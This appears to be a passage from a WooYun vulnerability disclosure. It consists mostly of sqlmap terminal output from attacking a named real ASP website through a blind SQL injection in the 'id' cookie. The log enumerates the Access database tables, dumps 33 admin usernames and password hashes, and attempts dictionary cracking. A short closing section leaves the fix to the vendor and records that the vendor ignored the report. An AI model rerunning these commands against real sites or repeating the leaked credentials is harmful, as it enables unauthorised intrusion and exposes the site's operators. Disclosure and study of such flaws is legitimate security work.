[09:55:41] [INFO] retrieved: book
[09:57:22] [INFO] tried 800/3137 items (26%)
[09:57:22] [INFO] heuristics detected web page charset 'GB2312'
[10:00:12] [INFO] retrieved: mail
[10:00:34] [INFO] retrieved: list
[10:00:47] [INFO] retrieved: keywords

Database: Microsoft_Access_masterdb
[7 tables]
+----------+
| user |
| admin |
| book |
| keywords |
| list |
| mail |
| news |
+----------+
[10:03:22] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3132 times
[10:03:22] [INFO] fetched data logged to text files under '/root/.sqlmap/output/ysh.cpicorp.com.cn'
[*] shutting down at 10:03:22
root@kali:~# sqlmap -u "http://ysh.cpicorp.com.cn/news.asp" --cookie "id=2560" --level 2 --columns -T "admin"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150708}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:05:42
[10:05:42] [INFO] resuming back-end DBMS 'microsoft access'
[10:05:42] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (Cookie)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2560 AND 2823=2823
---
[10:05:43] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access
[10:05:43] [ERROR] cannot retrieve column names, back-end DBMS is Access
do you want to use common column existence check? [Y/n/q]
[10:05:58] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast'
[10:05:58] [INFO] checking column existence using items from '/usr/share/sqlmap/txt/common-columns.txt'
[10:05:58] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)]
[10:05:59] [WARNING] running in a single-thread mode. This could take a while
[10:05:59] [INFO] retrieved: id
[10:06:41] [INFO] retrieved: color
[10:07:15] [INFO] retrieved: pwd
[10:07:30] [INFO] retrieved: admin
[10:11:40] [INFO] retrieved: classid
[10:12:08] [INFO] retrieved: admin

[10:12:09] [INFO] heuristics detected web page charset 'GB2312'
Database: Microsoft_Access_masterdb
Table: admin
[5 columns]
+---------+-------------+
| Column | Type |
+---------+-------------+
| admin | non-numeric |
| classid | non-numeric |
| color | non-numeric |
| id | numeric |
| pwd | non-numeric |
+---------+-------------+
[10:12:09] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2494 times
[10:12:09] [INFO] fetched data logged to text files under '/root/.sqlmap/output/ysh.cpicorp.com.cn'
root@kali:~# sqlmap -u "http://ysh.cpicorp.com.cn/news.asp" --cookie "id=2560" --level 2 --dump -C "admin,pwd" -T "admin"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150708}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:40:21
[10:40:21] [INFO] resuming back-end DBMS 'microsoft access'
[10:40:21] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (Cookie)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2560 AND 2823=2823
---
[10:40:21] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access
[10:40:21] [ERROR] cannot retrieve column names, back-end DBMS is Access
[10:40:21] [INFO] fetching entries of column(s) 'admin, classid, color, id, pwd' for table 'admin' in database 'Microsoft_Access_masterdb'
[10:40:21] [INFO] fetching number of column(s) 'admin, classid, color, id, pwd' entries for table 'admin' in database 'Microsoft_Access_masterdb'
[10:40:21] [INFO] resumed: 41
[10:40:21] [INFO] fetching number of distinct values for column 'id'
[10:40:21] [INFO] resumed: 41
[10:40:21] [INFO] using column 'id' as a pivot for retrieving row data
[10:40:21] [INFO] resumed: 102
[10:40:21] [INFO] resumed: ea27a7ec65993b13
[10:40:21] [INFO] resumed: admin
[10:40:21] [INFO] resumed:
[10:40:21] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:40:21] [INFO] retrieved:
[10:40:23] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast'
[10:40:23] [INFO] resumed: 167
[10:40:23] [INFO] resumed: 85799099818120cf
[10:40:23] [INFO] resumed: hdfgs
[10:40:23] [INFO] resumed:
[10:40:23] [INFO] retrieved:
[10:40:24] [INFO] resumed: 168
[10:40:24] [INFO] resumed: 122f44b0c8fb786a
[10:40:24] [INFO] resumed: hbfgs
[10:40:24] [INFO] resumed:
[10:40:24] [INFO] retrieved:
[10:40:25] [INFO] resumed: 169
[10:40:25] [INFO] resumed: 5041b101874aea02
[10:40:25] [INFO] resumed: xbfgs
[10:40:25] [INFO] resumed:
[10:40:25] [INFO] retrieved: ^[^A
[10:40:26] [INFO] resumed: 171
[10:40:26] [INFO] resumed: 52ed4d764d26ff34
[10:40:26] [INFO] resumed: jxgs
[10:40:26] [INFO] resumed:
[10:40:26] [INFO] retrieved:
[10:40:27] [INFO] resumed: 172
[10:40:27] [INFO] resumed: 67fe03dcdbad00d6
[10:40:27] [INFO] resumed: hngs
[10:40:27] [INFO] resumed:
[10:40:27] [INFO] retrieved:
[10:40:28] [INFO] resumed: 173
[10:40:28] [INFO] resumed: 465ccaa8b72fe776
[10:40:28] [INFO] resumed: hnfgs
[10:40:28] [INFO] resumed:
[10:40:28] [INFO] retrieved:
[10:40:29] [INFO] resumed: 174
[10:40:29] [INFO] resumed: 35555f36a72585a7
[10:40:29] [INFO] resumed: dbgs
[10:40:29] [INFO] resumed:
[10:40:29] [INFO] retrieved:
[10:40:30] [INFO] resumed: 175
[10:40:30] [INFO] resumed: a2aeabfbdd45c506
[10:40:30] [INFO] resumed: zdgj
[10:40:30] [INFO] resumed:
[10:40:30] [INFO] retrieved:
[10:40:31] [INFO] resumed: 176
[10:40:31] [INFO] resumed: c0f1b6a831c399e2
[10:40:31] [INFO] resumed: 123
[10:40:31] [INFO] resumed:
[10:40:31] [INFO] retrieved:
[10:40:32] [INFO] resumed: 177
[10:40:32] [INFO] resumed: 6f7c64d5d6a44bd1
[10:40:32] [INFO] resumed: ctgs
[10:40:32] [INFO] resumed:
[10:40:32] [INFO] retrieved:
[10:40:33] [INFO] resumed: 178
[10:40:33] [INFO] resumed: 809d068fffa76d26
[10:40:33] [INFO] resumed: cwgs
[10:40:33] [INFO] resumed:
[10:40:33] [INFO] retrieved:
[10:40:34] [INFO] resumed: 180
[10:40:34] [INFO] resumed: 1c983756ea9b2b7b
[10:40:34] [INFO] resumed: yngj
[10:40:34] [INFO] resumed:
[10:40:34] [INFO] retrieved:
[10:40:35] [INFO] resumed: 181
[10:40:35] [INFO] resumed: 23046518a13e12be
[10:40:35] [INFO] resumed: jxhd
[10:40:35] [INFO] resumed:
[10:40:35] [INFO] retrieved:
[10:40:36] [INFO] resumed: 182
[10:40:36] [INFO] resumed: 6f48df442c5cbdc5
[10:40:36] [INFO] resumed: mdny
[10:40:36] [INFO] resumed:
[10:40:36] [INFO] retrieved:
[10:40:37] [INFO] resumed: 183
[10:40:37] [INFO] resumed: 37f09672358ec7aa
[10:40:37] [INFO] resumed: cqfgs
[10:40:37] [INFO] resumed:
[10:40:37] [INFO] retrieved:
[10:40:38] [INFO] resumed: 184
[10:40:38] [INFO] resumed: b942de0ba40a163c
[10:40:38] [INFO] resumed: jdgf
[10:40:38] [INFO] resumed:
[10:40:38] [INFO] retrieved:
[10:40:39] [INFO] resumed: 185
[10:40:39] [INFO] resumed: 83aa400af464c76d
[10:40:39] [INFO] resumed: sdhd
[10:40:39] [INFO] resumed:
[10:40:39] [INFO] retrieved:
[10:40:40] [INFO] resumed: 186
[10:40:40] [INFO] resumed: c1f26a327d523b0a
[10:40:40] [INFO] resumed: jlhd
[10:40:40] [INFO] resumed:
[10:40:40] [INFO] retrieved:
[10:40:41] [INFO] resumed: 187
[10:40:41] [INFO] resumed: 8e3a708beb5c391f
[10:40:41] [INFO] resumed: nxnyly
[10:40:41] [INFO] resumed:
[10:40:41] [INFO] retrieved:
[10:40:42] [INFO] resumed: 188
[10:40:42] [INFO] resumed: 9100d6a089358eff
[10:40:42] [INFO] resumed: jyjt
[10:40:42] [INFO] resumed:
[10:40:42] [INFO] retrieved:
[10:40:43] [INFO] resumed: 189
[10:40:43] [INFO] resumed: a82bb52718c90176
[10:40:43] [INFO] resumed: gzx
[10:40:43] [INFO] resumed:
[10:40:44] [INFO] retrieved:
[10:40:45] [INFO] resumed: 190
[10:40:45] [INFO] resumed: 1360d417348186f4
[10:40:45] [INFO] resumed: wldl
[10:40:45] [INFO] resumed:
[10:40:45] [INFO] retrieved:
[10:40:46] [INFO] resumed: 192
[10:40:46] [INFO] resumed: cafd1495e6c51c0d
[10:40:46] [INFO] resumed: gcgs
[10:40:46] [INFO] resumed:
[10:40:46] [INFO] retrieved:
[10:40:47] [INFO] resumed: 193
[10:40:47] [INFO] resumed: da7f2b5c70773261
[10:40:47] [INFO] resumed: nfgs
[10:40:47] [INFO] resumed:
[10:40:47] [INFO] retrieved:
[10:40:48] [INFO] resumed: 194
[10:40:48] [INFO] resumed: 7f36a6d0e9ba5c11
[10:40:48] [INFO] resumed: nfgs
[10:40:48] [INFO] resumed:
[10:40:48] [INFO] retrieved:
[10:40:49] [INFO] resumed: 195
[10:40:49] [INFO] resumed: 49ba59abbe56e057
[10:40:49] [INFO] resumed: xjfgs
[10:40:49] [INFO] resumed:
[10:40:49] [INFO] retrieved:
[10:40:50] [INFO] resumed: 196
[10:40:50] [INFO] resumed: 90b13d6d29d89958
[10:40:50] [INFO] resumed: xzfgs
[10:40:50] [INFO] resumed:
[10:40:50] [INFO] retrieved:
[10:40:51] [INFO] resumed: 197
[10:40:51] [INFO] resumed: d1afe05843b6811c
[10:40:51] [INFO] resumed: hbgs
[10:40:51] [INFO] resumed:
[10:40:51] [INFO] retrieved:
[10:40:52] [INFO] resumed: 198
[10:40:52] [INFO] resumed: 819c8d17b52da589
[10:40:52] [INFO] resumed: jsgs
[10:40:52] [INFO] resumed:
[10:40:52] [INFO] retrieved:
[10:40:53] [INFO] resumed: 199
[10:40:53] [INFO] resumed: 7dc7da0ccb393d01
[10:40:53] [INFO] resumed: scgs
[10:40:53] [INFO] resumed:
[10:40:53] [INFO] retrieved:
[10:40:54] [INFO] resumed: 200
[10:40:54] [INFO] resumed: caa2c3e89d175cb5
[10:40:54] [INFO] resumed: zdh
[10:40:54] [INFO] resumed:
[10:40:54] [INFO] retrieved:
[10:40:55] [INFO] resumed: 201
[10:40:55] [INFO] resumed: 6ef195a0f7622a9c
[10:40:55] [INFO] retrieved:
[10:40:56] [INFO] heuristics detected web page charset 'GB2312'
gjky
[10:41:03] [INFO] retrieved:
[10:41:05] [INFO] retrieved:
[10:41:06] [INFO] retrieved: 202
[10:41:12] [INFO] retrieved: 21^C
[10:41:17] [WARNING] user aborted during enumeration. sqlmap will display partial output
[10:41:17] [INFO] analyzing table dump for possible password hashes
[10:41:17] [INFO] recognized possible password hashes in column 'pwd'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q]
[10:41:19] [INFO] using hash method 'mysql_old_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[10:41:20] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[10:41:20] [INFO] starting dictionary-based cracking (mysql_old_passwd)
[10:41:20] [WARNING] multiprocessing hash cracking is currently not supported on this platform
[10:41:57] [WARNING] no clear password(s) found
[10:41:57] [INFO] postprocessing table dump
Database: Microsoft_Access_masterdb
Table: admin
[33 entries]
+-----+---------+--------+-------+------------------+
| id | classid | admin | color | pwd |
+-----+---------+--------+-------+------------------+
| 102 | <blank> | admin | NULL | ea27a7ec65993b13 |
| 167 | <blank> | hdfgs | NULL | 85799099818120cf |
| 168 | <blank> | hbfgs | NULL | 122f44b0c8fb786a |
| 169 | <blank> | xbfgs | NULL | 5041b101874aea02 |
| 171 | <blank> | jxgs | NULL | 52ed4d764d26ff34 |
| 172 | <blank> | hngs | NULL | 67fe03dcdbad00d6 |
| 173 | <blank> | hnfgs | NULL | 465ccaa8b72fe776 |
| 174 | <blank> | dbgs | NULL | 35555f36a72585a7 |
| 175 | <blank> | zdgj | NULL | a2aeabfbdd45c506 |
| 176 | <blank> | 123 | NULL | c0f1b6a831c399e2 |
| 177 | <blank> | ctgs | NULL | 6f7c64d5d6a44bd1 |
| 178 | <blank> | cwgs | NULL | 809d068fffa76d26 |
| 180 | <blank> | yngj | NULL | 1c983756ea9b2b7b |
| 181 | <blank> | jxhd | NULL | 23046518a13e12be |
| 182 | <blank> | mdny | NULL | 6f48df442c5cbdc5 |
| 183 | <blank> | cqfgs | NULL | 37f09672358ec7aa |
| 184 | <blank> | jdgf | NULL | b942de0ba40a163c |
| 185 | <blank> | sdhd | NULL | 83aa400af464c76d |
| 186 | <blank> | jlhd | NULL | c1f26a327d523b0a |
| 187 | <blank> | nxnyly | NULL | 8e3a708beb5c391f |
| 188 | <blank> | jyjt | NULL | 9100d6a089358eff |
| 189 | <blank> | gzx | NULL | a82bb52718c90176 |
| 190 | <blank> | wldl | NULL | 1360d417348186f4 |
| 192 | <blank> | gcgs | NULL | cafd1495e6c51c0d |
| 193 | <blank> | nfgs | NULL | da7f2b5c70773261 |
| 194 | <blank> | nfgs | NULL | 7f36a6d0e9ba5c11 |
| 195 | <blank> | xjfgs | NULL | 49ba59abbe56e057 |
| 196 | <blank> | xzfgs | NULL | 90b13d6d29d89958 |
| 197 | <blank> | hbgs | NULL | d1afe05843b6811c |
| 198 | <blank> | jsgs | NULL | 819c8d17b52da589 |
| 199 | <blank> | scgs | NULL | 7dc7da0ccb393d01 |
| 200 | <blank> | zdh | NULL | caa2c3e89d175cb5 |
| 201 | <blank> | gjky | NULL | 6ef195a0f7622a9c |
+-----+---------+--------+-------+------------------+
[10:41:57] [INFO] table 'Microsoft_Access_masterdb.admin' dumped to CSV file '/root/.sqlmap/output/ysh.cpicorp.com.cn/dump/Microsoft_Access_masterdb/admin.csv'
[10:41:57] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 252 times
[10:41:57] [INFO] fetched data logged to text files under '/root/.sqlmap/output/ysh.cpicorp.com.cn'
[*] shutting down at 10:41:57


太慢了,就让我暂停了
点到为止

修复方案:

你们更专业

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-20 11:56

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无